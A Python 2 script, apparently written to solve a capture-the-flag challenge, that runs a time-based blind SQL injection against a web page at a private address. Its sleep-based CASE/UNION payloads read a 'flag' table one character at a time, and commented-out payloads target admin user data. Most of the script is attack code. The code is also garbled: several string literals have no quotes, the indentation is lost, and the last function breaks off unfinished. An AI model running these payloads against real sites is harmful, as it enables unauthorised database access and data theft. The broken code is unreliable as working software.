import requests
import random
import hashlib
import time
s = requests.Session()
url=http://10.66.20.180:3002/article.php
tables_count_num = 0
strings = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@!#$%*().<>1234567890{}"
def get_content(url):
for i in xrange(50):
# payload = "1 and ((SELECT length(user) from admin limit 1)="+str(i)+") and (sleep(2))"
# payload = "(select case when ((SELECT length(t.2) from (select 1,2,3,4 union select * from flag) limit "+str(j)+") >"+str(i)+") then 0 else sleep(2) end)"
payload = "(select case when ((SELECT length(t.4) from (select * from((select 1)a join(select 2)b join (select 3)c join (select 4)d) union/**/select * from flag) as t limit 1 offset 1) ="+str(i)+") then sleep(2) else 0 end)"
if get_data(payload):
print "[*] content_length: "+str(i)
content_length = i
break
content = ""
tmp_content = ""
for i in range(1,content_length+1):
for k in strings:
tmp_content = content+str(k)
tmp_content = tmp_content.ljust(content_length,_)
# payload = "1 and (SELECT ascii(mid(((SELECT user from admin limit 1))from("+str(i)+")))="+str(k+1)+") and (sleep(2))"
payload = "(select case when ((SELECT t.4 from (select * from((select 1)a join(select 2)b join (select 3)c join (select 4)d) union/**/select * from flag) as t limit 1 offset 1) like "+tmp_content+") then sleep(2) else 0 end)"
# print payload
if get_data(payload):
content += k
print "[*] content: "+content
break
print "[*] content: " + content
def get_response(payload):
s = requests.Session()
username = "teststeststests1234"
s.post()
def get_data(payload):
u = url+?id=+payload
print u
otime = time.time()
# print u.replace( ,%20)